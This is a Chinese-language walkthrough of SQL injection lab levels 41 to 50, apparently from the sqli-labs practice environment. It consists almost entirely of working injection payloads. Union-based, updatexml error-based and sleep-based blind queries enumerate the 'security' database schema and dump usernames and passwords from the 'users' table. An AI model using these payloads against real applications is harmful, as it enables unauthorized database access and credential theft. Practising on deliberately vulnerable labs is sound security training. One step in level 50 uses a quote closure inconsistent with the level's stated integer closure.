第四十一关
1、判断闭合和列数
整数闭合,共有3列
2、查看数据库名
?id=-1 union select 1,database() --+
3、查看数据表名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
4、查看users字段名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
5、查看users表内容
?id=-1 union select 1,2,group_concat(username ,id , password) from users --+
第四十二关
1、登录页面,尝试查看回显位置
2、查看数据库名
1' union select 1,database(),3 #
3、查看数据表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
4、查看users字段名
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
5、查看users表中内容
1' union select 1,group_concat(username,password),3 from users #
第四十三关
1、判断闭合和列数
输入1'),闭合成功,查看 1') order by 3 查看列数,共有三列
2、查看数据库名
1') union select 1,database(),3 #
3、查看数据表名
1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
4、查看users字段名
1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
5、查看users表内容
1') union select 1,group_concat(username,password),3 from users #
第四十四关
1、判断闭合和列数,查看回显点
1' union select 1,2,3 #,是' 闭合,共有三列
2、查看数据库名
1' union select 1,database(),3 #
3、查看数据表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
4、查看users字段名
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
5、查看users表内容
1' union select 1,group_concat(username,password),3 from users #
第四十五关
1、判断闭合和列数,查看回显点
输入1'),闭合成功,查看 1') union select 1,2,3# 查看列数,共有三列
2、查看数据库名
1') union select 1,database(),3 #
3、查看数据表名
1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
4、查看users字段名
1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
5、查看users表内容
1') union select 1,group_concat(username,password),3 from users #
第四十六关
1、判断闭合
发现有报错,尝试报错注入 是整数型闭合
2、查看数据库名
?sort=1 and updatexml(1,concat(1,database()),1)--+
3、查看数据表名
?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
4、查看users字段名
?sort=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
5、查看users表内容
依次查看用户名和密码
?sort=1 and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+
第四十七关
1、判断闭合
' 闭合,尝试报错注入
2、查看数据库名
?sort=1' and updatexml(1,concat(1,database()),1)--+
3、查看数据表名
?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
4、查看users字段名
?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
5、查看users表内容
依次查看用户名和密码
?sort=1' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+
第四十八关
1、判断闭合和列数
发现没有报错,没有回显,尝试时间盲注,整数型闭合
2、判断数据库名长度
?sort=1 and if(length((select database()))>8,sleep(3),1)--+
3、判断数据库名的ascii值
?sort=1 and if(ascii(substr((select database()),1,1))>114,sleep(3),1) --+
4、判断数据表名长度
?sort=1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1)--+
5、判断数据表名的ascii值
?sort=1 and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1)--+
6、判断users字段名长度
?sort=1 and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1)--+
7、判断users表字段的ascii值
?sort=1 and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>105,sleep(3),1)--+
8、判断users表内容字符长度
?sort=1 and if(length((select group_concat(username,password) from users))>189,sleep(3),1)--+
9、判断users表内容的ascii值
?sort=1 and if(ascii(substr((select group_concat(username,password) from users),1,1))>68,sleep(3),1)--+
第四十九关
1、判断闭合和列数
发现没有报错,没有回显,尝试时间盲注, ’ 闭合
2、判断数据库名长度
3、判断数据库名的ascii值
?sort=1' and if(ascii(substr((select database()),1,1))>114,sleep(3),1) --+
4、判断数据表名长度
?sort=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1)--+
5、判断数据表名的ascii值
?sort=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1)--+
6、判断users字段名长度
?sort=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1)--+
7、判断users表字段的ascii值
?sort=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>105,sleep(3),1)--+
8、判断users表内容字符长度
?sort=1' and if(length((select group_concat(username,password) from users))>189,sleep(3),1)--+
9、判断users表内容的ascii值
?sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>68,sleep(3),1)--+
第五十关
1、判断闭合和列数,查看回显点
整数型闭合,有报错,尝试报错注入
2、查看数据库名
?sort=1 and updatexml(1,concat(1,database()),1)--+
3、查看数据表名
?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
4、查看users字段名
?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
5、查看users表内容
依次查看用户名和密码
?sort=1 and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+
